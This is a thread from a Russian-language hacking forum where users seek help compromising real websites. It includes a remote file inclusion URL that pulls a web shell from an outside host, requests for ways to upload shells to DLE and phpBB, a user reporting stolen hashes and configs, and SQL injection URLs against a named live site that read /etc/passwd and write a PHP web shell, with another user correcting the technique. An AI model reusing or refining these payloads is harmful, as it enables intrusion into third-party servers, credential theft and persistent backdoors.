12.04.2010, 07:21
|
|
Новичок
Регистрация: 12.03.2009
Сообщений: 12
С нами:
9034597
Репутация:
2
|
|
Сообщение от Ctacok
/bla.php?s=http://disk.re4ka.net/upload/58739714/wso2.jpg.php?
Если же фильтрация на http, заюзай data http://www.xakep.ru/magazine/xa/127/060/1.asp
Warning: require_once() [function.require-once]: URL file-access is disabled in the server configuration
|
|
|
12.04.2010, 17:15
|
|
Участник форума
Регистрация: 15.07.2009
Сообщений: 158
С нами:
8854580
Репутация:
34
|
|
никто не знает как в DLE шелл залить ?!
|
|
|
|
11.04.2010, 22:50
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
С нами:
9410786
Репутация:
2731
|
|
Если RFI, то можешь залить на хостинг файлик functions.php, и проинклудить его.
Стукни мне в асю 674542, или в ПМ кинь сайт, посмотрю.
|
|
|
|
12.04.2010, 17:46
|
|
Новичок
Регистрация: 12.02.2010
Сообщений: 3
С нами:
8549537
Репутация:
0
|
|
Есть Учетка главного модера на phpBB 3.0.7, есть ли уязвимости для получения доступа к админке или заливки шела?
|
|
|
|
12.04.2010, 17:47
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами:
8885780
Репутация:
672
|
|
Сообщение от mayhem
Есть Учетка главного модера на phpBB 3.0.7, есть ли уязвимости для получения доступа к админке или заливки шела?
залить файл даже с правами админа не можешь
|
|
|
|
12.04.2010, 17:53
|
|
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
С нами:
9100556
Репутация:
912
|
|
Сообщение от Konqi
залить файл даже с правами админа не можешь
https://forum.antichat.ru/showpost.php?p=1176333&postcount=36 
Сообщение от Konqi
не знал,спс 
а есть ли возможность во втором версии? https://forum.antichat.ru/showpost.php?p=198446&postcount=3
Последний раз редактировалось .:[melkiy]:.; 12.04.2010 в 18:31..
|
|
|
|
12.04.2010, 18:14
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами:
8885780
Репутация:
672
|
|
Сообщение от .:[melkiy]:.
https://forum.antichat.ru/showpost.php?p=1176333&postcount=36 не знал,спс
а есть ли возможность во втором версии?
Последний раз редактировалось Konqi; 12.04.2010 в 18:17..
|
|
|
|
12.04.2010, 18:48
|
|
Reservists Of Antichat - Level 6
Регистрация: 07.07.2009
Сообщений: 324
С нами:
8866466
Репутация:
564
|
|
C одного ресурса вытащил хеши от всего от админки от ПМА и от форума и расшифровал (есть и инклуд, вытащил все конфиги тоже) но никуда не пускает, видимо сервер с вебом находится в локалки доступ к ктоторой идет через прокс.
Код:
PORT STATE SERVICE VERSION
22/tcp closed ssh
80/tcp open http-proxy Squid webproxy 2.6.STABLE21
443/tcp closed https
что можно сделать ? как можно обойти ? |
|
|
|
12.04.2010, 20:14
|
|
Новичок
Регистрация: 26.11.2008
Сообщений: 9
С нами:
9188109
Репутация:
-6
|
|
http://mindviz.com/gift.php?id=-717+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17--
тут File_Priv на Y..
http://mindviz.com/gift.php?id=-717+UNION+SELECT+1,2,3,4,5,6,7,8,LOAD_FILE('/etc/passwd'),10,11,12,13,14,15,16,17+from+mysql.user--
путь вроде /home/sites/mindviz/mail/
делаю так
http://mindviz.com/gift.php?id=-717+UNION+SELECT+1,2,3,4,5,6,7,8,<?include($_GET[сmd]);?>,10,11,12,13,14,15,16,17+from+mysql.user+into+ outfile+'/home/sites/mindviz/mail/shell.php'--
что не так..??
http://mindviz.com/shell.php?cmd=phpinfo(); че не идет?
|
|
|
|
12.04.2010, 20:26
|
|
Участник форума
Регистрация: 26.07.2008
Сообщений: 267
С нами:
9364549
Репутация:
184
|
|
papst
Путь неправильный. Вдобавок 9ое поле не выводится. Бери 7ое например.
И надеюсь ты понимаешь, что твой "шелл" делает?
PS into outfile и затем load_file() даже в /tmp/ не проходит.
Последний раз редактировалось budden; 12.04.2010 в 20:32..
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для .:[melkiy]:.](/avatars/avatar74910.jpg?2066720){kind=avatar}
Похожие темы
Комбинированный вид
